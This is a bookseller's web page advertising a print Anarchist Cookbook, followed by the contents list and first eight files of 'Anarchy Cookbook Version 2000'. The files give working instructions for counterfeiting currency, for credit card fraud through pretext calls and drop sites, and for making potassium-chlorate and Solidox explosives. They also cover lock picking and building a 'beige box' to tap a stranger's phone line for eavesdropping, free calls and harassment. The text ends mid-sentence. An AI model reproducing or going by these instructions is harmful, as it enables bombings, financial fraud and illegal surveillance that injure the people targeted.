The "Original" Anarchist Cookbook!
NOT A CD OR A DOWNLOAD BUT THE ACTUAL PAPER BOOK!

BANNED IN 80 COUNTRIES
The Anarchist Cookbook by William Powell, which contains instructions for
manufacturing explosives and telephone hacking devices, was among the TOP TEN of
the ALA's list of the 100 most banned books in the world.
Eric Harris and Dylan Klebold, perpetrators of the 1999 Columbine High School
massacre, read and used the Anarchist Cookbook.
| Size | |
| Height: | 11.0 in. |
| Width: | 8.3 in. |
| Thickness: | 0.5 in. |
| Weight: | 16.0 oz. |

Publisher's Note: The classic which has sold more than 2 million copies. Now in its 41st printing.

While The Anarchist Cookbook is legally available in the United States, it is
illegal in many other countries. The information contained in the book includes
instructions that, if followed, may be against the law (see felony for more
details). Because of this, access to the book is often restricted, with some
bookstores refusing to sell the book to persons under 21 years of age. The book is treated more
as a set of guidelines, or a book of ideas, than an instruction manual for
terrorists, though it has been accused of promoting violence. Part of this book
has a section on martial arts and unarmed street fighting.
The Anarchist Cookbook (ISBN 0-9623032-0-8) is a book written by William Powell.
It was published in 1970 and was intended as a protest against the United States
government over the Vietnam war. The book contains recipes and instructions for
the manufacture of explosives, drugs, a number of now-obsolete
telecommunications hacking devices, and other controversial themes. Despite the
name, the book has no connection to the anarchist movement and is in fact
heavily criticized by most anarchists.
The author has disowned it and, the copyright having been
registered in the name of his publisher, he does not receive royalties from it.
Item for sale for $35.00 postage paid delivered anywhere in the world!
Below are some 100 pages of files produced by pale imitators of the Anarchist Cookbook for sale above. Feel free to peruse the information, brought to you by the Dark Paladin Underground Bookseller. Please note that the following disclaimer applies:

DO NOT USE THIS INFO FOR ANY ILLEGAL
ACTIVITIES OR YOU MAY GO TO JAIL.
ANARCHY COOKBOOK VERSION 2000
Table of Contents
1. Counterfeiting Money
2. Credit Card Fraud
3. Making Plastic Explosives
4. Picking Master Locks
5. The Arts of Lockpicking I
6. The Arts of Lockpicking II
7. Solidox Bombs
8. High Tech Revenge: The Beigebox
9. CO² Bombs
10. Thermite II Bombs
11. Touch Explosives
12. Letter Bombs
13. Paint Bombs
14. Ways to send a car to HELL
15. Do you hate school?
16. Phone related vandalism
17. Highway police radar jamming
18. Smoke Bombs
19. Mail Box Bombs
20. Hot-wiring cars
21. Napalm
22. Fertilizer Bomb
23. Tennis Ball Bomb
24. Diskette Bombs
25. Unlisted Phone Numbers
26. Fuses
27. How to make Potassium Nitrate
28. Exploding Lightbulbs
29. Under water igniters
30. Home-brew blast cannon
31. Chemical Equivalency List
32. Phone Taps
33. Landmines
34. A different Molitov Cocktail
35. Phone Systems Tutorial I
36. Phone Systems Tutorial II
37. Basic Alliance Teleconferencing
38. Aqua Box Plans
39. Hindenberg Bomb
40. How to Kill Someone
41. Phone Systems Tutorial III
42. Black Box Plans
43. The Blotto Box
44. Blowgun
45. Brown Box Plans
46. Calcium Carbide Bomb
47. More Ways to Send a Car to Hell
48. Ripping off Change Machines
49. Clear Box Plans
50. CNA Number Listing
51. Electronic Terrorism
52. Start a Conf. w/o 2600hz or MF
53. Dynamite
54. Auto Exhaust Flame Thrower
55. How to Break into BBs Express
56. Firebomb
57. Fuse Bomb
58. Generic Bomb
59. Green Box Plans
60. Portable Grenade Launcher
61. Basic Hacking Tutorial I
62. Basic Hacking Tutorial II
63. Hacking DEC's
64. Harmless Bombs
65. Breaking into Houses
66. Hypnotism
67. Remote Informer Issue #1
68. Jackpotting ATM Machines
69. Jug Bomb
70. Fun at K-Mart
71. Mace Substitute
72. How to Grow Marijuana
73. Match Head Bomb
74. Terrorizing McDonalds
75. "Mentor's" Last Words
76. The Myth of the 2600hz Detector
77. Blue Box Plans
78. Napalm II
79. Nitroglycerin Recipe
80. Operation: Fuckup
81. Stealing Calls from Payphones
82. Pool Fun
83. Free Postage
84. Unstable Explosives
85. Weird Drugs
86. The Art of Carding
87. Recognizing Credit Cards
88. How to Get a New Identity
89. Remote Informer Issue #2
90. Remote Informer Issue #3
91. Remote Informer Issue #4
92. Remote Informer Issue #5
93. Phreaker's Guide to Loop Lines
94. Ma-Bell Tutorial
95. Getting Money out of Pay Phones
96. Computer-based PBX
97. PC-Pursuit Port Statistics
98. Pearl Box Plans
99. The Phreak File
100. Red Box Plans
101. RemObS
102. Scarlet Box Plans
103. Silver Box Plans
104. Bell Trashing
105. Canadian WATS Phonebook
106. Hacking TRW
107. Hacking VAX & UNIX
108. Verification Circuits
109. White Box Plans
110. The BLAST Box
111. Dealing with the R&R Operator
112. Cellular Phone Phreaking
113. Cheesebox Plans
114. Start Your Own Conferences
115. Gold Box Plans
116. The History of ESS
117. The Lunch Box
118. Olive Box Plans
119. The Tron Box
120. More TRW Info
121. "Phreaker's Phunhouse"
122. Phrack Magazine-Vol. 3, Issue 27
123. Phrack Magazine-Vol. 3, Issue 27
124. Phrack Magazine-Vol. 3, Issue 28
125. Phrack Magazine-Vol. 3, Issue 28
126. Phrack Magazine-Vol. 3, Issue 28
127. Phrack Magazine-Vol. 3, Issue 30
128. Phrack Magazine-Vol. 3, Issue 30
129. Phrack Magazine-Vol. 3, Issue 30
130. Sodium Chlorate
131. Mercury Fulminate
132. Improvised Black Powder
133. Nitric Acid
134. Dust Bomb Instructions
135. Carbon-Tet Explosive
136. Making Picric Acid from Aspirin
137. Reclamation of RDX from C-4
138. Egg-based Gelled Flame Fuels
139. Clothespin Switch
140. Flexible Plate Switch
141. Low Signature System [Silencers]
142. Delay Igniter From Cigarette
143. Nicotine
144. Dried Seed Timer
145. Nail Grenade
146. Bell Glossary
147. Phone Dial Locks -- Beat'em
148. Exchange Scanning
149. A Short History of Phreaking
150. "Secrets of the Little Blue Box"
151. The History of British Phreaking
152. "Bad as Shit"
153. Telenet
154. Fucking with the Operator
155. Phrack Magazine-Vol. 1, Issue 1
156. International Country Codes List
157. Infinity Transmitter Plans
158. LSD
159. Bananas
160. Yummy Marihuana Recipes
161. Peanuts
162. Chemical Fire Bottle
163. Igniter from Book Matches
164. "Red or White Powder" Propellant
165. Pipe Hand Grenade
166. European Credit Card Fraud
167. Potassium Bomb
168. Your Legal Rights
169. Juvenile Offenders' Rights
170. Down The Road Missle
171. Fun With Shotgun Shells
172. Surveillance Equipment
173. Drip Timer
174. Stealing
175. Miscellaneous
176. Shaving cream bomb
177. Ripping off change machines II
178. Lockpicking the EASY way
179. Anarchy 'N' Explosives Prelude
180. Anarchy 'N' Explosives Vol. 1
181. Anarchy 'N' Explosives Vol. 2
182. Anarchy 'N' Explosives Vol. 3
183. Anarchy 'N' Explosives Vol. 4
184. Anarchy 'N' Explosives Vol. 5
185. Explosives and Propellants
186. Lockpicking III
187. Chemical Equivalent List II
188. Nitroglycerin II
189. Cellulose Nitrate
190. Starter Explosives
191. Flash Powder
192. Exploding Pens
193. Revised Pipe Bombs
194. * SAFETY * A MUST READ!
195. Ammonium TriIodide
196. Sulfuric Acid & Amm. Nitrate III
197. Black Powder III
198. Nitrocellulose
199. RDX
200. The Black Gate BBS
201. ANFOS
202. Picric Acid II
203. Bottled Explosives
204. Dry Ice
205. Fuses / Ignitors / Delays
206. Film Canister Bombs
207. Book Bombs
208. Phone Bombs
209. Special Ammunition
210. Rocketry
211. Pipe Cannon II
212. Smoke Bombs
213. Firecrackers
214. Suppliers II
215. Lab-Raid Checklist
216. Misc Anarchy
217. Combo Locks II
218. Misc Anarchy II
219. Thermite IV
1. Counterfeiting Money by The Jolly Roger
Before reading this article, it would be a very good idea to get a book on photo
offset printing, for this is the method used in counterfeiting US currency. If
you are familiar with this method of printing,
counterfeiting should be a simple task for you.
Genuine currency is made by a process called "gravure", which involves etching a
metal block. Since etching a metal block is impossible to do by hand, photo
offset printing comes into the process.
Photo offset printing starts by making negatives of the currency with a camera,
and putting the negatives on a piece of masking material (usually orange in
color). The stripped negatives, commonly
called "flats", are then exposed to a lithographic plate with an arc light plate
maker. The burned plates are then developed with the proper developing chemical.
One at a time, these plates are wrapped
around the plate cylinder of the press.
The press to use should be an 11 by 14 offset, such as the AB Dick 360. Make 2
negatives of the portrait side of the bill, and 1 of the back side. After
developing them and letting them dry, take them
to a light table. Using opaque on one of the portrait sides, touch out all the
green, which is the seal and the serial numbers. The back side does not require
any retouching, because it is all
one color. Now, make sure all of the negatives are registered (lined up
correctly) on the flats. By the way, every time you need another serial number,
shoot 1 negative of the portrait side, cut out the
serial number, and remove the old serial number from the flat replacing it with
the new one.
Now you have all 3 flats, and each represents a different color: black, and 2
shades of green (the two shades of green are created by mixing inks). Now you
are ready to burn the plates. Take a
lithographic plate and etch three marks on it. These marks must be 2 and 9/16
inches apart, starting on one of the short edges. Do the same thing to 2 more
plates. Then, take 1 of the flats and place it
on the plate, exactly lining the short edge up with the edge of the plate. Burn
it, move it up to the next mark, and cover up the exposed area you have already
burned. Burn that, and do the same thing 2
more times, moving the flat up one more mark. Do the same process with the other
2 flats (each on a separate plate). Develop all three plates. You should now
have 4 images on each plate with an
equal space between each bill.
The paper you will need will not match exactly, but it will do for most
situations. The paper to use should have a 25% rag content. By the way, Disaperf
computer paper (invisible perforation) does the
job well. Take the paper and load it into the press. Be sure to set the air,
buckle, and paper thickness right. Start with the black plate (the plate without
the serial numbers). Wrap it around the cylinder
and load black ink in. Make sure you run more than you need because there will
be a lot of rejects. Then, while that is printing, mix the inks for the serial
numbers and the back side. You will need to
add some white and maybe yellow to the serial number ink. You also need to add
black to the back side. Experiment until you get it right. Now, clean the press
and print the other side. You will now
have a bill with no green seal or serial numbers. Print a few with one serial
number, make another and repeat. Keep doing this until you have as many
different numbers as you want. Then cut the bills
to the exact size with a paper cutter. You should have printed a large amount of
money by now, but there is still one problem; the paper is pure white. To dye
it, mix the following in a pan: 2 cups of hot
water, 4 tea bags, and about 16 to 20 drops of green food coloring (experiment
with this). Dip one of the bills in and compare it to a genuine US bill. Make
the necessary adjustments, and dye all the
bills. Also, it is a good idea to make them look used. For example, wrinkle
them, rub coffee grinds on them, etc.
As before mentioned, unless you are familiar with photo offset printing, most of
the information in this article will be fairly hard to understand. Along with
getting a book on photo offset printing, try to
see the movie "To Live and Die in LA". It is about a counterfeiter, and the
producer does a pretty good job of showing how to counterfeit. A good book on
the subject is "The Poor Man's James
Bond".
If all of this seems too complicated to you, there is one other method available
for counterfeiting: The Canon color laser copier. The Canon can replicate
ANYTHING in vibrant color, including US
currency. But, once again, the main problem in counterfeiting is the paper used.
So, experiment, and good luck!
2. Credit Card Fraud by The Jolly Roger
For most of you out there, money is hard to come by. Until now:
With the recent advent of plastic money (credit cards), it is easy to use
someone else's credit card to order the items you have always desired in life.
The stakes are high, but the payoff is worth it.
Step One: Getting the credit card information
First off, you must obtain the crucial item: someone's credit card number. The
best way to get credit card numbers is to take the blue carbons used in a credit
card transaction at your local department
store. These can usually be found in the garbage can next to the register, or
for the more daring, in the garbage dumpster behind the store. But, due to the
large amount of credit card fraud, many stores
have opted to use a carbonless transaction sheet, making things much more
difficult. This is where your phone comes in handy.
First, look up someone in the phone book, and obtain as much information as
possible about them. Then, during business hours, call in a very convincing
voice - "Hello, this is John Doe from the Visa
Credit Card Fraud Investigations Department. We have been informed that your
credit card may have been used for fraudulent purposes, so will you please read
off the numbers appearing on your
Visa card for verification." Of course, use your imagination! Believe it or not,
many people will fall for this ploy and give out their credit information.
Now, assuming that you have your victim's credit card number, you should be able
to decipher the information given.
Step Two: Recognizing information from carbon copies
Card example:
[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE
Explanation:
MM/Y1 is the date the card was issued, and MM/Y2 is the expiration date. The
American Express Gold Card has numbers XXXXXX XXXXXXXX XXXXXXXX, and is covered
for up to
$5000.00, even if the card holder is broke.
[Mastercard]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE
Explanation:
XXXX in the second row may be asked for during the ordering process. The first
date is when the card was new, and the second is when the card expires. The most
frequent number combination used
is 5424 1800 XXXX XXXX. There are many of these cards in circulation, but many
of these are on wanted lists, so check these first.
[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
JOE SHMOE
Explanation:
Visa is the most abundant card, and is accepted almost everywhere. The "*VISA"
is sometimes replaced with "BWG", or followed with a special code. These codes
are as follows:
[1] MM/YY*VISA V - Preferred Card
[2] MM/YY*VISA CV - Classic Card
[3] MM/YY*VISA PV - Premier Card
Preferred Cards are backed with money, and are much safer to use. Classic Cards
are newer, harder to reproduce cards with decent backing. Premier Cards are
Classic Cards with Preferred
coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000 XXXX, and 4254
5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards are IBM Credit Union cards, and
are risky to
use, although they are usually covered for large purchases.
Step Three: Testing credit
You should now have a Visa, Mastercard, or American Express credit card number,
with the victim's address, zip code, and phone number. By the way, if you have
problems getting the address, most
phone companies offer the Address Tracking Service, which is a special number
you call that will give you an address from a
phone number, at a nominal charge. Now you need to check the balance of credit
on the credit card (to make sure you don't run out of money), and you must also
make sure that the card isn't stolen.
To do this you must obtain a phone number that businesses use to check out
credit cards during purchases. If you go to a department store, watch the
cashier when someone makes a credit card
purchase. He/she will usually call a phone number, give the credit information,
and then give what is called a "Merchant Number". These numbers are usually
written down on or around the register. It is
easy to either find these numbers and copy them, or to wait until they call one
in. Watch what they dial and wait for the 8 digit (usually) merchant number.
Once you call the number, in a calm voice,
read off the account number, merchant number, amount, and expiration date. The
credit bureau will tell you if it is OK, and will give you an authorization
number. Pretend you are writing this number
down, and repeat it back to them to check it. Ignore this number completely, for
it serves no real purpose. However, once you do this, the bank removes dollars
equal to what you told them, because
the card was supposedly used to make a purchase. Sometimes you can trick the
operator by telling her the customer changed his mind and decided not to charge
it. Of course, some will not allow this.
Remember at all times that you are supposed to be a store clerk calling to check
out the card for a purchase. Act like you are talking with a customer when
he/she "cancels".
Step Four: The drop
Once the cards are cleared, you must find a place to have the package sent.
NEVER use a drop more than once. The following are typical drop sites:
[1] An empty house
An empty house makes an excellent place to send things. Send the package UPS,
and leave a note on the door saying, "UPS. I work days, 8 to 6. Could you please
leave the package on the back
door step?" You can find dozens of houses from a real estate agent by telling
them you want to look around for a house. Ask for a list of twenty houses for
sale, and tell them you will check out the
area. Do so, until you find one that suits your needs.
[2] Rent A Spot
U-Haul sometimes rents spaces where you can have packages sent and signed for.
End your space when the package arrives.
[3] People's houses
Find someone you do not know, and have the package sent there. Call ahead saying
that "I called the store and they sent the package to the wrong address. It was
already sent, but can you keep it
there for me?" This is a very reliable way if you keep calm when talking to the
people.
Do NOT try post office boxes. Most of the time, UPS will not deliver to a post
office box, and many people have been caught in the past attempting to use a
post office box. Also, when you have
determined a drop site, keep an eye on it for suspicious characters and cars
that have not been there before.
Step Five: Making the transaction
You should now have a reliable credit card number with all the necessary billing
information, and a good drop site.
The best place to order from is catalogues, and mail order houses. It is in your
best interest to place the phone call from a pay phone, especially if it is a
1-800 number. Now, when you call, don't try to
disguise your voice, thinking you will trick the salesperson into believing you
are an adult. These folks are trained to detect this, so your best bet is to
order in your own voice. They will ask for the
following: name, name as it appears on card, phone number, billing address,
expiration date, method of shipping, and product. Ask if they offer UPS Red
shipping (next day arrival), because it gives
them less time to research an order. If you are using American Express, you
might have a bit of a problem shipping to an address other than the billing
address. Also, if the salesperson starts to ask
questions, do NOT hang up. Simply talk your way out of the situation, so you
won't encourage investigation on the order.
If everything goes right, you should have the product, free of charge. Insurance
picks up the tab, and no one is any wiser. Be careful, and try not to order
anything over $500. In some states, UPS
requires a signature for anything over $200, not to mention that anything over
$200 is defined as grand theft, as well as credit fraud. Get caught doing this,
and you will bite it for a couple of years.
Good luck!
3. Making Plastic Explosives from Bleach by The Jolly Roger
Potassium chlorate is an extremely volatile explosive compound, and has been
used in the past as the main explosive filler in grenades, land mines, and
mortar rounds by such countries as France and
Germany. Common household bleach contains a small amount of potassium chlorate,
which can be extracted by the procedure that follows.
First off, you must obtain:
1. A heat source (hot plate, stove, etc.)
2. A hydrometer, or battery hydrometer
3. A large Pyrex, or enameled steel container (to weigh chemicals)
4. Potassium chloride(sold as a salt substitute at health and nutrition stores)
Take one gallon of bleach, place it in the container, and begin heating it.
While this solution heats, weigh out 63 grams of potassium chloride and add this
to the bleach being heated. Constantly check
the solution being heated with the hydrometer, and boil until you get a reading
of 1.3. If using a battery hydrometer, boil until you read a FULL charge.
Take the solution and allow it to cool in a refrigerator until it is between
room temperature and 0°C. Filter out the crystals that have formed and save
them. Boil this solution again and cool as before.
Filter and save the crystals.
Take the crystals that have been saved, and mix them with distilled water in the
following proportions: 56 grams per 100 milliliters distilled water. Heat this
solution until it boils and allow to cool. Filter
the solution and save the crystals that form upon cooling. This process of
purification is called "fractional crystallization". These crystals should be
relatively pure potassium chlorate.
Powder these to the consistency of face powder, and heat gently to drive off all
moisture.
Now, melt five parts Vaseline with five parts wax. Dissolve this in white
gasoline (camp stove gasoline), and pour this liquid on 90 parts potassium
chlorate (the powdered crystals from above) into a
plastic bowl. Knead this liquid into the potassium chlorate until intimately
mixed. Allow all gasoline to evaporate.
Finally, place this explosive into a cool, dry place. Avoid friction, sulfur,
sulfides, and phosphorous compounds. This explosive is best molded to the
desired shape and density of 1.3 grams in a cube
and dipped in wax until water proof. These block type charges guarantee the
highest detonation velocity. Also, a blasting cap of at least a 3 grade must be
used.
The presence of the afore mentioned compounds (sulfur, sulfides, etc.) results
in mixtures that are or can become highly sensitive and will possibly decompose
explosively while in storage. You should
never store homemade explosives, and you must use EXTREME caution at all times
while performing the processes in this
article.
You may obtain a catalog of other subject of this nature by writing:
Information Publishing Co.
Box 10042
Odessa, Texas 79762
4. Picking Master Locks by The Jolly Roger
Have you ever tried to impress someone by picking one of those Master
combination locks and failed?
The Master lock company made their older combination locks with a protection
scheme. If you pull the handle too hard, the knob will not turn. That was their
biggest mistake.
The first number:
Get out any of the Master locks so you know what is going on. While pulling on
the clasp (part that springs open when you get the combination right), turn the
knob to the left until it will not move any
more, and add five to the number you reach. You now have the first number of the
combination.
The second number:
Spin the dial around a couple of times, then go to the first number you got.
Turn the dial to the right, bypassing the first number once. When you have
bypassed the first number, start pulling on the clasp
and turning the knob. The knob will eventually fall into the groove and lock.
While in the groove, pull the clasp and turn the knob. If the knob is loose, go
to the next groove, if the knob is stiff, you have
the second number of the combination.
The third number:
After getting the second number, spin the dial, then enter the two numbers.
Slowly spin the dial to the right, and at each number, pull on the clasp. The
lock will eventually open if you did the process
right.
This method of opening Master locks only works on older models. Someone informed
Master of their mistake, and they employed a new mechanism that is foolproof
(for now).
5. The Arts of Lockpicking I by The Jolly Roger
Lockpicking I: Cars and assorted other locks
While the basic themes of lockpicking and uninvited entry have not changed much
in the last few years, some modern devices and techniques have appeared on the
scene.
Automobiles:
Many older automobiles can still be opened with a Slim Jim type of opener (these
and other auto locksmithing techniques are covered fully in the book "In the
Still of the Night", by John Russell III);
however, many car manufacturers have built cases over the lock mechanism, or
have moved the lock mechanism so the Slim Jim will not work. So:
American Locksmith Service
P.O. Box 26
Culver City, CA 90230
ALS offers a new and improved Slim Jim that is 30 inches long and 3/4 inches
wide, so it will both reach and slip through the new car lock covers (inside the
door). Price is $5.75 plus $2.00 postage
and handling.
Cars manufactured by General Motors have always been a bane to people who needed
to open them, because the sidebar locking unit they employ is very difficult to
pick. To further complicate
matters, the new GM cars employ metal shields to make the use of a Slim Jim type
instrument very difficult. So:
Lock Technology Corporation
685 Main St.
New Rochelle, NY 10801
LTC offers a cute little tool which will easily remove the lock cylinder without
harm to the vehicle, and will allow you to enter and/or start the vehicle. The
GMC-40 sells for $56.00 plus $2.00 for
postage and handling.
The best general automobile opening kit is probably a set of lockout tools
offered by:
Steck MFG Corporation
1319 W. Stewart St.
Dayton, OH 45408
For $29.95 one can purchase a complete set of six carbon lockout tools that will
open more than 95% of all the cars around.
Kwickset locks have become quite popular as one step security locks for many
types of buildings. They are a bit harder to pick and offer a higher degree of
security than a normal builder installed door
lock. So:
A MFG
1151 Wallace St.
Massilon, OH 44646
Price is $11.95. Kwickset locks can handily be disassembled and the door opened
without harm to either the lock or the door by using the above mentioned Kwick
Out tool.
If you are too lazy to pick auto locks:
Veehof Supply
Box 361
Storm Lake, IO 50588
VS sells tryout keys for most cars (tryout keys are used since there is no one
master key for any one make of car, but there are group type masters (a.k.a.
tryout keys). Prices average about $20.00 a
set.
Updated Lockpicking:
For years, there have been a number of pick attack procedures for most pin and
tumbler lock systems. In reverse order of ease they are as follows:
Normal Picking:
Using a pick set to align the pins, one by one, until the shear line is set and
the lock opens.
Racking:
This method uses picks that are constructed with a series of bumps, or diamond
shape notches. These picks are "raked" (i.e. run over all the pins at one time).
With luck, the pins will raise in the open
position and stay there. Raking, if successful, can be much less of an effort
than standard picking.
Lock Aid Gun:
This gun shaped device was invented a number of years ago and has found
application with many locksmiths and security personnel. Basically, a needle
shaped pick is inserted in the snout of the "gun",
and the "trigger" is pulled. This action snaps the pick up and down strongly. If
the tip is slipped under the pins, they will also be snapped up and down
strongly. With a bit of luck they will strike each
other and separate at the shear line for a split second. When this happens the
lock will open. The lock aid gun is not 100% successful, but when it does work,
the results are very dramatic. You can
sometimes open the lock with one snap of the trigger.
Vibrator:
Some crafty people have mounted a needle pick into an electric toothbrush power
unit. This vibrating effect will sometimes open pin tumbler locks -- instantly.
There is now another method to open pin and wafer locks in a very short time.
Although it resembles a toothbrush pick in appearance, it is actually an
electronic device. I am speaking of the Cobra pick
that is designed and sold by:
Fed Corporation
P.O. Box 569
Scottsdale, AR 85252
The Cobra uses two nine volt batteries, teflon bearings (for less noise), and a
cam roller. It comes with three picks (for different types of locks) and works
both in America and overseas, on pin or
wafer locks. The Cobra will open group one locks (common door locks) in three to
seven seconds with no damage, in the hands of an experienced locksmith. It can
take a few seconds more or up to a
half a minute for someone with no experience at all. It will also open group two
locks (including government, high security, and medicos), although this can take
a short time longer. It will not open GM
sidebar locks, although a device is about to be introduced to fill that gap. How
much for this toy that will open most locks in seven seconds?
$235.00 plus $4.00 shipping and handling.
For you hard core safe crackers, FC also sells the MI-6 that will open most
safes at a cost of $10,000 for the three wheel attack model, and $10,500 for the
four wheel model. It comes in a sturdy
aluminum carrying case with monitor, disk drive and software.
If none of these safe and sane ideas appeal to you, you can always fall back on
the magic thermal lance...
The thermal lance is a rather crude instrument constructed from 3/8 inch hollow
magnesium rods. Each tube comes in a 10 foot length, but can be cut down if
desired. Each one is threaded on one end.
To use the lance, you screw the tube together with a matted regulator (like a
welding outfit uses) and hook up an oxygen tank. Then oxygen is turned on and
the rod is lit with a standard welding igniter.
The device produces an incredible amount of heat. It is used for cutting up
concrete blocks or even rocks. An active lance will go through a foot of steel
in a few seconds. The lance is also known as a
burning bar, and is available from:
C.O.L. MFG
7748 W. Addison
Chicago, IL 60634
6. The Arts of Lockpicking II by The Jolly Roger
So you want to be a criminal. Well, if you want to be like James Bond and open a
lock in fifteen seconds, then go to Hollywood, because that is the only place
you are ever going to do it. Even
experienced locksmiths can spend five to ten minutes on a lock if they are
unlucky. If you are wanting extremely quick access, look elsewhere. The
following instructions will pertain mostly to the "lock
in knob" type lock, since it is the easiest to pick.
First of all, you need a pick set. If you know a locksmith, get him to make you
a set. This will be the best possible set for you to use. If you find a
locksmith unwilling to supply a set, don't give up hope.
It is possible to make your own, if you have access to a grinder (you can use a
file, but it takes forever).
The thing you need is an allen wrench set (very small). These should be small
enough to fit into the keyhole slot. Now, bend the long end of the allen wrench
at a slight angle (not 90°). Now, take your
pick to a grinder or a file, and smooth the end until it is rounded so it won't
hang inside the lock. Test your tool out on doorknobs at your house to see if it
will slide in and out smoothly. Now, this is
where the screwdriver comes in. It must be small enough for it and your pick to
be used in the same lock at the same time, one above the other. In the coming
instructions, please refer to this chart of
the interior of a lock:
______________________________
\ K
| | | | | | / E
| | | | \ Y [|] Upper tumbler pin
^ ^ / H [^] Lower tumbler pin
^ ^ ^ ^ ^ ^ \ O [-] Cylinder wall
/ L (This is a greatly simplified
\ E drawing)
______________________________/
The object is to press the pin up so that the space between the upper pin and
the lower pin is level with the cylinder wall. Now, if you push a pin up, it's
tendency is to fall back down, right? That is
where the screwdriver comes in. Insert the screwdriver into the slot and turn.
This tension will keep the "solved" pins from falling back down. Now, work from
the back of the lock to the front, and
when you are through, there will be a click, the screwdriver will turn freely,
and the door will open.
Do not get discouraged on your first try! It will probably take you about twenty
to thirty minutes your first time. After that, you will quickly improve with
practice.
7. Solidox Bombs by The Jolly Roger
Most people are not aware that a volatile, extremely explosive chemical can be
bought over the counter: Solidox.
Solidox comes in an aluminum can containing 6 grey sticks, and can be bought at
K-Mart, and various hardware supply shops for around $7.00. Solidox is used in
welding applications as an oxidizing
agent for the hot flame needed to melt metal. The most active ingredient in
Solidox is potassium chlorate, a filler used in many military applications in
the WWII era.
Since Solidox is literally what the name says: SOLID OXygen, you must have an
energy source for an explosion. The most common and readily available energy
source is common household sugar, or
sucrose. In theory, glucose would be the purest energy source, but it is hard to
find a solid supply of glucose.
Making the mixture:
1. Open the can of Solidox, and remove all 6 sticks. One by one, grind up each
of the sticks (preferably with a mortar and pestle) into the finest powder
possible.
2. The ratio for mixing the sugar with the Solidox is 1:1, so weigh the Solidox
powder, and grind up the equivalent amount of sugar.
3. Mix equivalent amounts of Solidox powder, and sugar in a 1:1 ratio.
It is just that simple! You now have an extremely powerful substance that can be
used in a variety of applications. A word of caution: be EXTREMELY careful in
the entire process. Avoid friction,
heat, and flame. A few years back, a teenager I knew blew 4 fingers off while
trying to make a pipe bomb with Solidox. You have been warned!
8. High Tech Revenge: The Beigebox - Rev.2 by The Jolly Roger
I. Introduction
Have you ever wanted a lineman's handset? Surely every phreak has at least once
considered the phun that he could have with one. After searching unlocked phone
company trucks for months, we had
an idea. We could build one. We did, and named it the "Beige Box" simply because
that is the color of ours.
The beigebox is simply a consumer lineman's handset, which is a phone that can
be attached to the outside of a person's house. To fabricate a beigebox, follow
along.
II. Construction and Use
The construction is very simple. First you must understand the concept of the
device. In a modular jack, there are four wires. These are red, green, yellow,
and black. For a single line telephone,
however, only two matter: the red (ring) and green (tip). The yellow and the
black are not necessary for this project. A lineman's handset has two clips on
it: the ring and the tip. Take a modular jack
and look at the bottom of it's casing. There should be a grey jack with four
wires (red, green, yellow & black) leading out of it. To the end of the red wire
attach a red alligator clip. To the end of the
green wire attach a green alligator clip. The yellow and black wires can be
removed, although I would only set them aside so that you can use the modular
jack in future projects. Now insert your
telephone's modular plug into the modular jack. That's it. This particular model
is nice because it is can be easily made, is inexpensive, uses common parts that
are readily available, is small, is
lightweight, and does not require the destruction of a phone.
III. Beige Box Uses
There are many uses for a Beige Box. However, before you can use it, you must
know how to attach it to the output device. This device can be of any of Bell
switching apparatus that include germinal
sets (i.e. remote switching centers, bridgin heads, cans, etc.) To open most
Bell Telephone switching apparatus, you must have a 7/16 inch hex driver (or a
good pair of needle nose pliers work also).
This piece of equipment can be picked up at your local hardware store. With your
hex driver (or pliers), turn the security bolt(s) approximately 1/8 of an inch
counter-clockwise and open. If your
output device is locked, then you must have some knowledge of destroying and/or
picking locks. However, we have never encountered a locked output device. Once
you have opened your output
device, you should see a mass of wires connected to terminals. On most output
devices, the terminals should be labeled "T" (Tip -- if not labeled, it is
usually on the left) and "R" (Ring -- if not labeled,
usually on the right).
Remember: Ring - red - right. The "Three R's" -- a simple way to remember which
is which. Now you must attach all the red alligator clip (Ring) to the "R"
(Ring) terminal. Attach the green alligator clip
(Tip) to the "T" (Tip) terminal.
Note: If instead of a dial tone you hear nothing, adjust the alligator clips so
that they are not touching each other terminals. Also make sure they are firmly
attached. By this time you should hear a dial
tone. Dial ANI to find out the number you are using (you wouldn't want to use
your own). Here are some practical applications:
· Eavesdropping
· Long distance, static free, free fone calls to phriends
· Dialing direct to Alliance Teleconferencing (also no static)
· Phucking people over
· Bothering the operator at little risk to yourself
· Blue Boxing with greatly reduced chance of getting caught
· Anything at all you want, since you are on an extension of that line
Eavesdropping
To be most effective, first attach the Beige Box then your phone. This
eliminates the static caused by connecting the box, therefore reducing the
potential suspicion of your victim. When eavesdropping,
it is always best to be neither seen nor heard. If you hear someone dialing out,
do not panic; but rather hang up, wait, and pick up the receiver again. The
person will either have hung up or tried to
complete their call again. If the latter is true, then listen in, and perhaps
you will find information worthy of blackmail! If you would like to know who you
are listening to, after dialing ANI, pull a CN/A
on the number.
Dialing Long Distance
This section is self explanatory, but don't forget to dial a "1" before the NPA.
Dialing Direct to Alliance Teleconferencing
Simply dial 0-700-456-1000 and you will get instructions from there. I prefer
this method over PBX's, since PBX's often have poor reception and are more
difficult to come by.
Phucking People Over
This is a very large topic of discussion. Just by using the other topics
described, you can create a large phone bill for the person (they will not have
to pay for it, but it will be a big hassle for them). In
addition, since you are an extension of the person's line, you can leave your
phone off the hook, and they will not be able to make or receive calls. This can
be extremely nasty because no one would
expect the cause of the problem.
Bothering the Operator
This is also self explanatory and can provide hours of entertainment. Simply ask
her things that are offensive or you would not like traced to your line. This
also corresponds to the previously described
section, Phucking People Over. After all, guess who's line it gets traced to?
Blue Boxing
See a file on Blue Boxing for more details. This is an especially nice feature
if you live in an ESS-equipped prefix, since the calls are, once again, not
traced to your line...
IV. POTENTIAL RISKS OF BEIGE BOXING
Overuse of the Beige Box may cause suspicions within the Gestapo, and result in
legal problems. Therefor, I would recommend you:
· Choose a secluded spot to do your Beige Boxing,
· Use more than one output device
· Keep a low profile (i.e., do not post under your real name on a public BBS
concerning your accomplishments)
In order to make sure the enemy has not been inside your output device, I
recommend you place a piece of transparent tape over the opening of your output
device. Therefor, if it is opened in your
absence, the tape will be displaced and you will be aware of the fact that
someone has intruded on your territory.
Now, imagine the possibilities: a $2000 dollar phone bill for that special
person, 976 numbers galore, even harassing the operator at no risk to you! Think
